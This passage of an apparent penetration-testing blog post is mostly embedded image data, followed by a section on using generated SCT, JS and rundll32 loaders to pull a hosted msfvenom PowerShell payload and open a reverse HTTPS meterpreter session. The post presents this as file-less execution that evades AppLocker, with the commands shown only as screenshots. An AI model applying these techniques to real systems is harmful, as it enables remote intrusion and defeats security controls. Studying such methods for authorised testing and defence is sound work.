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" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"></a><br /></div>
<div style="text-align: justify;">
</div>
<h3 style="text-align: left;">
Usage with metasploit</h3>
<div style="text-align: justify;">
Some of the above scripts can be used to get a meterpreter session in the following ways:</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin-left: 1em; margin-right: 1em;">
</div>
<br />
<div style="text-align: justify;">
<div style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;">
</div>
Create a PowerShell meterpreter payload using msfvenom:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSo05cf4f6mx22zkIA2YDaxkQEE8zYDILzKDWeJ87_3bQydhogicNAu0TWRitabUsnU72WFYXaeV4xafUsOQVDL05AmyDJma9KqTKQVquxjNspreoORSAnnw3l8RtVlqYL3Ls6aJbMWRM/s1600/msfpayload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSo05cf4f6mx22zkIA2YDaxkQEE8zYDILzKDWeJ87_3bQydhogicNAu0TWRitabUsnU72WFYXaeV4xafUsOQVDL05AmyDJma9KqTKQVquxjNspreoORSAnnw3l8RtVlqYL3Ls6aJbMWRM/s400/msfpayload.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Host the generated payload on a web server.<br />
<br />
<b>Using Out-SCT</b><br />
Pass the URL where meterprer PowerShell script is hosted to Out-SCT.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRrpKq0AGX79t_14qwEfQFZZlskiZ9Rkb4FzEAnhFoG8E_Ue3LthZm9hO9VBFEqZrJk6zURwy8audoUmU0J28kYtPj3IKJVADnHZ_mjACJqBgYWe7lhO11u8d0ccT10X-Zqn2-Lle5XkA/s1600/Out-SCT-meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhRrpKq0AGX79t_14qwEfQFZZlskiZ9Rkb4FzEAnhFoG8E_Ue3LthZm9hO9VBFEqZrJk6zURwy8audoUmU0J28kYtPj3IKJVADnHZ_mjACJqBgYWe7lhO11u8d0ccT10X-Zqn2-Lle5XkA/s400/Out-SCT-meterpreter.png" width="400" /></a></div>
Now, host the generated SCT file on a web server. When the generated regsvr32 command is executed on a target, this will happen:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis2EMH_yxU92j-nD4ajHQ4QGZA1kgWqnqO7fS_buUYh5sc_w8Stiqlv3Zu_Re_wbgmihDLWLrBJoNZFfu3PhJ04S3WtYsIuIC2h8jm9rySjBCepUo4P66BR3ndy6tpMp9TNwwbkg-HwRQ/s1600/sct-meterpreter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis2EMH_yxU92j-nD4ajHQ4QGZA1kgWqnqO7fS_buUYh5sc_w8Stiqlv3Zu_Re_wbgmihDLWLrBJoNZFfu3PhJ04S3WtYsIuIC2h8jm9rySjBCepUo4P66BR3ndy6tpMp9TNwwbkg-HwRQ/s400/sct-meterpreter.png" width="400" /></a></div>
<br />
Awesome! A reverse HTTPS meterpreter from a file-less execution which is also helpful in avoiding Applocker!<br />
<br />
<b>Using Out-JS</b><br />
Pass the URL to Out-JS.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZf5UkZdRzpMVy-KWMNKEkXcQCug4hVnkE7NN2yVIU5ECLDfxNwB0rK2Cil6ZKsh2m-XKLN4nDtQ3zkxDksgXc8p2NF-r9lLhFp_ui_huQD_7AA5OavU6B400ZAxtlcZvQu49DrQCb7vE/s1600/Out-JS-meter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZf5UkZdRzpMVy-KWMNKEkXcQCug4hVnkE7NN2yVIU5ECLDfxNwB0rK2Cil6ZKsh2m-XKLN4nDtQ3zkxDksgXc8p2NF-r9lLhFp_ui_huQD_7AA5OavU6B400ZAxtlcZvQu49DrQCb7vE/s400/Out-JS-meter.png" width="400" /></a></div>
When the generated Style,js is executed on a target, we will get a connect back on msfconsole!<br />
<br />
<b>Using Out-RundllCommand</b><br />
Pass the URL to Out-RundllCommand.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbDOLJuAFX_NGPX5QBkmwrG4prY1PLN2UbpiQ6qNQ8GvB_gvHgkKlZBun58mxjgXFlgOU0KNr8mjDU_TMyIbea2oizRP9d6Oqyo5EJzbDoIbTa7wLwivEV_wV-r-YoDcNZBfiQrGLGSPw/s1600/out-rundll-meter.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbDOLJuAFX_NGPX5QBkmwrG4prY1PLN2UbpiQ6qNQ8GvB_gvHgkKlZBun58mxjgXFlgOU0KNr8mjDU_TMyIbea2oizRP9d6Oqyo5EJzbDoIbTa7wLwivEV_wV-r-YoDcNZBfiQrGLGSPw/s400/out-rundll-meter.png" width="400" /></a></div>
Once again, when the generated rundll32 command is executed on a target, a meterpreter will pop-up in the msfconsole.<br />
<br />
<a href="data:image/png;base64,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